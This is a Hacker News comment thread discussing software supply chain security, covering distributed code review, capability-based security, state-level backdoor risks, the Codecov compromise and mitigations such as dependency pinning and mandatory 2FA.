Hacker Read top | best | new | newcomments | leaders | about | bookmarklet login

Imo this is the missing puzzle piece (and the more important one for me personally) for software supply chain security, the other ones being deterministic builds and signed binaries.

And the real problem aren't even people trying to steal your bitcoins [1], you notice that and hopefully had not all your eggs in one basket, it's a (sometimes expensive) lesson in IT security. The much more serious threat are state level actors trying to backdoor secure communication channels, the breach will happen without your knowledge. One shouldn't expect that every nation will take the obvious and public route like the Australian government [2], simply demanding access. With enough resources it seems totally viable to backdoor just one deep dependency of some UI framework and circumvent all end to end encryption used by affected apps.

I hope distributed code review will get some traction not only in the Rust world, but in the whole open source universe.

[1] https://news.ycombinator.com/item?id=18534392

[2] https://arstechnica.com/tech-policy/2018/12/signal-to-austra...



sort by: page size:

>The current software engineering paradigm has no meaningful answer to this, no matter what "security experts" tell you. In a sane industry this realization would lead to a change of the paradigm, but people in our industry seem to be only doubling down.

Capability-based security is one possible answer. The Austral language is trying to make this a first-class language feature:

>The problem is that code is overwhelmingly permissionless. Or, rather: all code has uniform root permissions. The size of today’s software ecosystems has introduced a new category of security vulnerability: the supply chain attack. An attacker adds malware to an innocent library used transitively by millions. It is downloaded and run, with the user’s permissions, on the computers of hundreds of thousands of programmers, and afterwards, on application servers.

>The solution is capability-based security. Code should be permissioned. To access the console, or the filesystem, or the network, libraries should require the capability to do so. Then it is evident, from function signatures, what each library is able to do, and what level of auditing is required.

https://austral.github.io/spec/rationale-capabilities


> It's a unbelievably gargantuan effort

Also applies to software supply chains:

https://www.platformsecuritysummit.com/2019/speaker/sherman/

> Today’s software is largely assembled rather than written, and most of the assembly comes from open source components. The creation of components and their inclusion into applications creates a “supply chain” just like in conventional manufacturing. While physical supply chains have well established chains-of-custody to establish properties like refrigeration maintenance, authenticity or spoilage avoidance, the software supply chain is very much a wild, wild west, filled with vulnerabilities that can be (and are) inadvertently inserted into applications. As supply chain risk and mitigations are being explored by government and academia, a larger attack surface is being uncovered that needs to be addressed.


>How do we even mitigate against these types of supply-chain attacks, aside from disabling run-scripts, using lockfiles and carefully auditing the entire dependency tree on every module update?

Don't trust the package distribution system - use public key crypto.


I - and many others - don’t think this is enough to mitigate supply chain attacks. It’s too easy for a malicious developer to add cryptolocker ransomware in a point release. But I also don’t think having a package in Debian will somehow magically solve this problem either. Debian package maintainers do not - and never have - done security audits on the packages they add. It’s magical thinking to assume using packages in Debian will somehow protect you from supply chain attacks. Asking developers to keep their dependency trees small so we can minimise the risk is a losing battle. Using lots of small, popular dependencies is just too convenient.

There is a solution out there that I wish got more traction. And that is, capability based security. The idea is simple: we partition programs into application code and library code. Library code can never access the filesystem or network (or other protected data) directly. And this is enforced by the compiler or language runtime. Application code can. If you want a library to interact with a file, you first open the file in application code and pass the file handle to the library. Similar wrappers can be made for directories, network sockets and so on. If I want express to listen on a specific port, I pass it that port in a capability object. Not just an integer. (Eg app.listen(net.listenPort(8000))). The amount of code that would need to be changed is tiny since well behaved libraries don’t usually need many capabilities to do their job.

It is ridiculous that my 3rd party json library can invisibly access all the sensitive files on my computer. With capabilities, we take that privilege away. I have no problem trusting a random json library if it literally only has access to the json string I pass it. If we had a capability based security model, I would have no qualms about pulling in hundreds of transitive dependencies. My libraries can still only access exactly what I pass them.

Unfortunately this problem requires language level buy-in. It would be very hard to retrofit rust to work this way and that’ll probably never happen. Raw pointers and inline assembly also make a bit of a mess of things too. (Though pointer provenance might help). But a man can dream… Maybe in rust’s successor.


100%. I have plenty of insider knowledge here I sadly cannot share, but search for supply chain attacks and the sheer number of public headlines of known attacks can keep you busy for days. State actors are constantly trying to get footholds in software supply chains, and often succeed.

Consider Intel ME firmware is a literal well documented backdoor we do not allow on US government systems... only civilians.

Most of the time our adversaries do not need to be covert enough to mess with firmware. Consider OMA-DM apps that run on most phones with insane permissions taking orders from cell towers.

https://gist.github.com/thestinger/171b5ffdc54a50ee44497028a...

We cannot even keep public open source repos like NPM free of supply chain attacks. Proprietary blobs make it that much easier to hide things.

Also all you need to backdoor every encrypted messenger is a kernel module that ensures /dev/urandom is a bit less random on the devices of targeted dissidents and journalists. Now look at how many proprietary blobs from piles of random vendors we load into modern phone operating systems, even "open" android roms, and think about SolarWinds for a second.


I do not think I am missing out: the supply chain attack which included playing the long game, subverting the trust of the development community is the real issue that the open source community has no defences against – the thwarted attack has surpassed the scale of all previous supply chain attacks on NodeJs, Python and similar ecosystems and went deep down into the low level, technical layers as well.

The assault was comprehensive, holistic and systematic in its approach – this article does not mention it, but other reports have indicated that the person behind it also managed to compromise the PKI layer at the edge between OpenSSL and sshd which brings an extra level of complexity to the backdoor.


> how fragile software supply chain security is, despite the abundance of tools and available security mechanisms

There seems to be a fundamental trade-off at play. I often see security portrayed as a hindrance, requirements thereof as a drag on productivity. That is in line with a strong trend in developers with a very narrow skill set. The ability to throw framework at the wall and see what sticks pays very well. No one wants a stick in the mud asking why on Earth dependency management is at the state it is, or imposing reasonable security practices. I have been there, I have argued with developers from teams that had been breached before saying "no, this is safe because I can't see how this could be exploited". Security by obscurity so deeply ingrained one takes obscurity from oneself as evidence of safety.


Totally agree with you, i think it's time to think carefully and immediately start using services like Vulert(https://bit.ly/336DZub) that tracks your open-source softwares for free and notifies you in real-time if any seccurity issue is found within your applciation. it's free.

atleast in this way we can secure ourselves from supply chain attacks


Totally agree with you, i think it's time to think carefully and immediately start using services like Vulert(https://bit.ly/336DZub) that tracks your open-source softwares for free and notifies you in real-time if any seccurity issue is found within your applciation. it's free.

atleast in this way we can secure ourselves from supply chain attacks


[delayed]

Ah, our old friend supply chain security.

This is a very, very hard problem to solve without some serious coordination and effort. To do this well you need to do all kinds of things like:

1. Verifying the authenticity of the software you're looking at. Is that really libxml or has someone fed you a poisoned package? Does it have a checksum? Is the registry or repository we pulled it from adequately secured?

2. Verifying the provenance of a particular version of a package. Who made this change? Why did they make it? Is the change safe?

3. Vetting the governance of a package or library. We may know of Apache and have some confidence in the governance of that project, but what about leftpad of NodeJS/npm fame? Is that logging library we got for our Rust app off of crates.io managed by a reputable OSS developer and/or company, or are the motivations of the entities building it uncertain? Can they be bought? Bought out? Sued? Blackmailed? If you're looking at this with the mindset of a state-sponsored organization that handles anything remotely important these are not unreasonable considerations.

The list goes on and on. It helps if you're working in an ecosystem that has high level of quality standards for the libraries or software packages that are being used, but there's always more to dig up the deeper you go into a dependency tree.

I'm of the opinion that supply chain attacks can be mitigated, but never eliminated. Having many eyes on a project helps (thanks to all of you working on projects with openly available sources!). We're still a long way from making our industry's tools and development processes naturally robust to these things, though I'm excited to see more dialog around these issues.


> These days it's practically a necessity for companies to shell out money to some sort of supply-chain protection software (Sonatype, Socket.dev etc.)

A number of some serious assumptions here. How can you be sure that you’re protected if you spend money on these commercial tools? It’s an arms race after all. There are other ways to protect yourself (pinning dependencies, allow list). A few open source tools are also available to audit code.


Great example of supply chain risks and attacker's with a flexible approach here.

Why bother compromising a large number of hardened bank/government networks when you can backdoor a software update server that delivers code directly to the desktops of privileged users in those companies...

It's a tricky problem to solve to. Automatic updates are very good for reducing the number of people running outdated & vulnerable code, but centralized software update servers become tempting targets for attackers.


That's only the case if I am unable to review the code myself, before any update, I fully understand the code, and I am smart enough that the contributors are unable to pull a fast one on me.

Given that I'm not a cryptography expert, I have a limited number of hours in the day, and open-source supply chain attacks are typically obfuscated, I don't consider that to be a trivial statement.


Securing supply chain is an important effort even outside of regulation. Here is a podcast about some recent open source efforts:

Kubernetes Podcast 155: Software Supply Chain Security, with Priya Wadhwa

https://kubernetespodcast.com/episode/155-software-supply-ch...


Supply chain attacks have great reach and often go undiscovered. Hence the popularity of it.

From the article:

The appeal of supply chain attacks to hackers is their breadth and effectiveness. By compromising a single player high in the software supply, hackers can potentially infect any person or organization who uses the compromised product. Another feature that hackers find beneficial: there’s often little or nothing targets can do to detect malicious software distributed this way because digital signatures will indicate that it's legitimate.

In the case of the backdoored bash update version, however, it would have been easy for Codecov or any of its customers to detect the malice by doing nothing more than checking the shasum. The ability for the malicious version to escape notice for three months indicates that no one bothered to perform this simple check.


Nobody's going to use untrusted binaries/sources in this age of supply chain security..

Check out https://socket.dev/ Been super impressed by their approach to identifying and securing codebases against supply chain attacks (and I believe they have a special deal for open source repos too!)

Wonderful news. Supply chain security is a disaster because developers won't opt into any kind of security features in the majority. Mandating 2FA is the obvious solution, and we'll all be radically safer for it.

Glad to see Github pushing this, I hope package repositories follow suit!

next

Legal | privacy